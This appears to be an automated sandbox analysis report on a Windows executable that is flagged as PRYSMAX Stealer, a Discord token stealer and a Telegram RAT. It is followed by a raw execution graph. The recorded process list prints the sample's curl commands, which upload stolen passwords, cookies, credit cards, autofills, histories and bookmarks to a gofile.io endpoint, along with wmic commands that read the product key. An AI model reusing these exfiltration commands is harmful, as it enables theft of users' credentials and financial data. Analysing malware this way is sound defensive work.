X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"1cd-0mADn2yhHeGiiS5ZLxVpVtECWFo"
2024-12-21 20:51:42 UTC | 461 | IN | Data Ascii: {"status":"ok","data":{"servers":[{"name":"store-eu-par-3","zone":"eu"},{"name":"store6","zone":"eu"},{"name":"store5","zone":"eu"},{"name":"store4","zone":"eu"},{"name":"store1","zone":"eu"}],"serversAllZone":[{"name":"store3","zone":"na"},{"name":"store



Target ID: 0
Start time: 15:51:31
Start date: 21/12/2024
Path: C:\Users\user\Desktop\main.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\main.exe"
Imagebase: 0x7ff733390000
File size: 27'577'634 bytes
MD5 hash: C0E4C8F676E781C9DD3D57FFA4F99111
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                              Start time:15:51:31
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                              Start time:15:51:35
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\main.exe"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff733390000
                                                                                                                                                                                                                                                                              File size:27'577'634 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C0E4C8F676E781C9DD3D57FFA4F99111
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PRYSMAXSTEALER, Description: Yara detected PRYSMAX STEALER, Source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                              Start time:15:51:36
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                              Imagebase:0x7ff623550000
                                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x40000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                              Start time:15:51:41
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:wmic path softwarelicensingservice get OA3xOriginalProductKey
                                                                                                                                                                                                                                                                              Imagebase:0x7ff623550000
                                                                                                                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7c7be0000
                                                                                                                                                                                                                                                                              File size:530'944 bytes
                                                                                                                                                                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                              Start time:15:51:42
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6cc770000
                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                              Start time:15:51:48
                                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6ce040000
                                                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true


                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                Execution Coverage:10%
                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                Signature Coverage:16.1%
                                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                                Total number of Limit Nodes:73
7ff7333ac0f6 17304->17306 17305->17307 17308 7ff7333ab464 __free_lconv_mon 11 API calls 17306->17308 17307->17292 17308->17292 17310 7ff7333aea61 17309->17310 17312 7ff7333a5eee 17309->17312 17310->17312 17361 7ff7333b4574 17310->17361 17313 7ff7333aeab8 17312->17313 17314 7ff7333aeae0 17313->17314 17315 7ff7333aeacd 17313->17315 17314->17286 17315->17314 17374 7ff7333b38c0 17315->17374 17326 7ff7333b48c0 17317->17326 17352 7ff7333b4878 17326->17352 17357 7ff7333b1548 EnterCriticalSection 17352->17357 17362 7ff7333ac050 __CxxCallCatchBlock 45 API calls 17361->17362 17363 7ff7333b4583 17362->17363 17364 7ff7333b45ce 17363->17364 17373 7ff7333b1548 EnterCriticalSection 17363->17373 17364->17312 17375 7ff7333ac050 __CxxCallCatchBlock 45 API calls 17374->17375 17376 7ff7333b38c9 17375->17376 21560 7ff7333bbfd9 21563 7ff7333a62e8 LeaveCriticalSection 21560->21563 20669 7ff7333bc06e 20670 7ff7333bc087 20669->20670 20671 7ff7333bc07d 20669->20671 20673 7ff7333b15a8 LeaveCriticalSection 20671->20673 20703 7ff7333a6280 20704 7ff7333a628b 20703->20704 20712 7ff7333b0514 20704->20712 20725 7ff7333b1548 EnterCriticalSection 20712->20725 18071 7ff73339c1fc 18092 7ff73339c3dc 18071->18092 18074 7ff73339c353 18259 7ff73339c6fc IsProcessorFeaturePresent 18074->18259 18075 7ff73339c21d __scrt_acquire_startup_lock 18077 7ff73339c35d 18075->18077 18083 7ff73339c23b __scrt_release_startup_lock 18075->18083 18078 7ff73339c6fc 7 API calls 18077->18078 18080 7ff73339c368 __CxxCallCatchBlock 18078->18080 18079 7ff73339c260 18081 7ff73339c2e6 18100 7ff7333aa6b8 18081->18100 18083->18079 18083->18081 18248 7ff7333aaa64 18083->18248 18085 7ff73339c2eb 18106 7ff733391000 18085->18106 18089 7ff73339c30f 18089->18080 18255 7ff73339c560 18089->18255 18093 7ff73339c3e4 18092->18093 18094 7ff73339c3f0 __scrt_dllmain_crt_thread_attach 18093->18094 18095 7ff73339c215 18094->18095 18096 7ff73339c3fd 18094->18096 18095->18074 18095->18075 18266 7ff7333ab30c 18096->18266 18101 7ff7333aa6c8 18100->18101 
18102 7ff7333aa6dd 18100->18102 18101->18102 18103 7ff7333aa148 40 API calls 18101->18103 18102->18085 18104 7ff7333aa6e6 18103->18104 18104->18102 18105 7ff7333aa508 12 API calls 18104->18105 18105->18102 18107 7ff733392b80 18106->18107 18309 7ff7333a63c0 18107->18309 18109 7ff733392bbc 18316 7ff733392a70 18109->18316 18113 7ff73339bb10 _log10_special 8 API calls 18115 7ff7333930ec 18113->18115 18253 7ff73339c84c GetModuleHandleW 18115->18253 18116 7ff733392cdb 18492 7ff7333939d0 18116->18492 18117 7ff733392bfd 18483 7ff733391c60 18117->18483 18120 7ff733392c1c 18388 7ff733397e70 18120->18388 18123 7ff733392d2a 18515 7ff733391e50 18123->18515 18126 7ff733392c4f 18133 7ff733392c7b __vcrt_freefls 18126->18133 18487 7ff733397fe0 18126->18487 18127 7ff733392d1d 18128 7ff733392d22 18127->18128 18129 7ff733392d45 18127->18129 18511 7ff73339f5a4 18128->18511 18131 7ff733391c60 49 API calls 18129->18131 18134 7ff733392d64 18131->18134 18135 7ff733397e70 14 API calls 18133->18135 18142 7ff733392c9e __vcrt_freefls 18133->18142 18139 7ff733391930 115 API calls 18134->18139 18135->18142 18136 7ff733397f80 40 API calls 18137 7ff733392dcc 18136->18137 18138 7ff733397fe0 40 API calls 18137->18138 18140 7ff733392dd8 18138->18140 18141 7ff733392d8e 18139->18141 18143 7ff733397fe0 40 API calls 18140->18143 18141->18120 18144 7ff733392d9e 18141->18144 18142->18136 18148 7ff733392cce __vcrt_freefls 18142->18148 18145 7ff733392de4 18143->18145 18146 7ff733391e50 81 API calls 18144->18146 18147 7ff733397fe0 40 API calls 18145->18147 18154 7ff733392bc9 __vcrt_freefls 18146->18154 18147->18148 18149 7ff733397e70 14 API calls 18148->18149 18150 7ff733392e04 18149->18150 18151 7ff733392ef9 18150->18151 18152 7ff733392e29 __vcrt_freefls 18150->18152 18153 7ff733391e50 81 API calls 18151->18153 18167 7ff733392e6c 18152->18167 18401 7ff733397f80 18152->18401 18153->18154 18154->18113 18156 7ff733393033 18526 7ff7333985b0 18156->18526 18157 7ff73339303a 18159 7ff733397e70 14 API calls 
18157->18159 18161 7ff73339304f __vcrt_freefls 18159->18161 18162 7ff733393187 18161->18162 18163 7ff73339308a 18161->18163 18533 7ff7333938f0 18162->18533 18164 7ff733393094 18163->18164 18165 7ff73339311a 18163->18165 18408 7ff7333985c0 18164->18408 18169 7ff733397e70 14 API calls 18165->18169 18167->18156 18167->18157 18172 7ff733393126 18169->18172 18170 7ff733393195 18173 7ff7333931b7 18170->18173 18174 7ff7333931ab 18170->18174 18176 7ff7333930a5 18172->18176 18179 7ff733393133 18172->18179 18175 7ff733391c60 49 API calls 18173->18175 18536 7ff733393a40 18174->18536 18186 7ff73339310e __vcrt_freefls 18175->18186 18182 7ff733391e50 81 API calls 18176->18182 18183 7ff733391c60 49 API calls 18179->18183 18180 7ff73339320a 18458 7ff733398950 18180->18458 18182->18154 18184 7ff733393151 18183->18184 18184->18186 18187 7ff733393158 18184->18187 18186->18180 18188 7ff7333931ed SetDllDirectoryW LoadLibraryExW 18186->18188 18190 7ff733391e50 81 API calls 18187->18190 18188->18180 18189 7ff73339321d SetDllDirectoryW 18192 7ff733393250 18189->18192 18236 7ff7333932a1 18189->18236 18190->18154 18194 7ff733397e70 14 API calls 18192->18194 18193 7ff733393433 18196 7ff73339343e 18193->18196 18202 7ff733393445 18193->18202 18201 7ff73339325c __vcrt_freefls 18194->18201 18195 7ff733393362 18463 7ff733392780 18195->18463 18198 7ff7333985b0 5 API calls 18196->18198 18199 7ff733393443 18198->18199 18199->18202 18203 7ff733393339 18201->18203 18207 7ff733393295 18201->18207 18613 7ff733392720 18202->18613 18206 7ff733397f80 40 API calls 18203->18206 18206->18236 18207->18236 18539 7ff733396200 18207->18539 18236->18193 18236->18195 18249 7ff7333aaa7b 18248->18249 18250 7ff7333aaa9c 18248->18250 18249->18081 18251 7ff7333ab358 45 API calls 18250->18251 18252 7ff7333aaaa1 18251->18252 18254 7ff73339c85d 18253->18254 18254->18089 18257 7ff73339c571 18255->18257 18256 7ff73339c326 18256->18079 18257->18256 18258 7ff73339ce18 7 API calls 18257->18258 18258->18256 18260 7ff73339c722 
